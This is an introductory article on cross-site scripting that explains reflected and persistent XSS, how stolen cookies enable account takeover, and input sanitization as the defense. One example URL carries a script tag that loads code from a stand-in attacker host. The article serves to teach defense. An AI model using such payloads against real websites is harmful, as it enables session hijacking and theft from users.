----
title: XSS - Cross-Site Scripting
------

XSS is a term used to describe a class of attacks that allow an attacker to inject client-side scripts through the website into the browsers of other users. Because the injected code comes to the browser from the site, the code is trusted and can do things like send the user's site authorization cookie to the attacker. When the attacker has the cookie, they can log into a site as though they were the user and do anything the user can, such as access their credit card details, see contact details, or change passwords.

Note: XSS vulnerabilities have been historically more common than any other type of security threat.

The XSS vulnerabilities are divided into reflected and persistent, based on how the site returns the injected scripts to a browser.

A reflected XSS vulnerability occurs when user content that is passed to the server is returned immediately and unmodified for display in the browser. Any scripts in the original user content will be run when the new page is loaded.
For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link that contains a malicious script as a parameter (e.g., http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js"></script>) and email it to another user. If the target user clicks this "interesting link", the script will be executed when the search results are displayed. As discussed earlier, this gives the attacker all the information they need to enter the site as the target user, potentially making purchases as the user or sharing their contact information.
A persistent XSS vulnerability occurs when the malicious script is stored on the website and then later redisplayed unmodified for other users to execute unwittingly.
For example, a discussion board that accepts comments that contain unmodified HTML could store a malicious script from an attacker. When the comments are displayed, the script is executed and can send to the attacker the information required to access the user's account. This sort of attack is extremely popular and powerful, because the attacker might not even have any direct engagement with the victims.

While the data from POST or GET requests is the most common source of XSS vulnerabilities, any data from the browser is potentially vulnerable, such as cookie data rendered by the browser, or user files that are uploaded and displayed.

The best defense against XSS vulnerabilities is to remove or disable any markup that can potentially contain instructions to run the code. For HTML this includes elements, such as <script>, <object>, <embed>, and <link>.

The process of modifying user data so that it can't be used to run scripts or otherwise affect the execution of server code is known as input sanitization. Many web frameworks automatically sanitize user input from HTML forms by default.



